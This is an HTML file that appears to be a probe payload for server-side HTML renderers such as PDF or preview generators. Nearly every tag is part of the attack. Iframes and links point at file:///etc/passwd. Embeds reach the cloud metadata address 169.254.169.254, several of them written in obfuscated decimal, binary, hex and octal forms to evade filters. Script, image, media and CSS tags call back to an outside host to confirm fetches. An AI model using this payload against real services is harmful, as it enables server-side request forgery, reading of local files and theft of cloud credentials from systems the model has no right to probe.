<html>
<head>
    <title>Hello title</title>
    <link rel=attachment href="file:///etc/passwd" />
    <link rel="stylesheet" type="text/css"
        href="https://stylesheet.n33ma.com/callbackplz">
    <meta property="og:image" content="https://ogimage.n33ma.com/callbackplz">
    <meta property="og:url" content="https://ogurl.n33ma.com/callbackplz">
    <style>
        body {
            background-color: yellow;
            background-image: url('https://bgimage.n33ma.com/callbackplz')
        }
        #cssspan {
            content: expression("hello css express");
        }
    </style>
</head>
<body>
    Hello body <br>
    <span id="jsspan"></span><br>
    <span id="imgerror"></span><br>
    <span id="cssspan"></span><br>
    <noscript>Hello noscript</noscript><br>
    <!-- <script>window.location="metadata url or something like that"</script> -->
    <script src="https://scripttag.n33ma.com/callbackplz"></script><br>
    <img src="https://imgtag.n33ma.com/callbackplz"
        onerror="document.getElementById('imgerror').innerText='imgonerror'"><br>
    <img src="https://h1research.appspot.com/files/h1.png"><br>
    <script>
        document.getElementById('jsspan').innerText = 'Hello script'
    </script>
    passwd<br>
    <iframe src="file:///etc/passwd"></iframe><br>
    dataiframe<br>
    <iframe src="data:text/html,%3Ch1%3EHello%2C%20dataurliframe!%3C%2Fh1%3E"></iframe><br>
    google<br>
    <iframe src="https://iframe.n33ma.com/callbackplz"></iframe><br>
    metadata<br>
    <iframe src="http://169.254.169.254/latest/meta-data/"></iframe><br>
    <a href="https://anchor.n33ma.com/callbackplz">hello anchor</a>
    <audio controls>
        <source src="https://audio.n33ma.com/callbackplz" type="audio/mpeg">
        Hello unsupported audio
    </audio>
    <video controls>
        <source src="https://video.n33ma.com/callbackplz" type="video/mp4">
        Hello unsupported video
    </video>
    <svg width="100" height="100">
        <circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
    </svg>
    <embed src="https://embed.n33ma.com/callbackplz" width="250" height="200" /><br>
    <embed src="http://2852039166/latest/meta-data/" width="250" height="200" /><br>
    <embed src="http://0b10101001111111101010100111111110/latest/meta-data/" width="250" height="200" /><br>
    <embed src="http://0xa9.fe.a9.fe/latest/meta-data/" width="250" height="200" /><br>
    <embed src="http://0251.376.251.376 /latest/meta-data/" width="250" height="200" /><br>
    <form>
        Hello form
    </form>
</body>
</html>
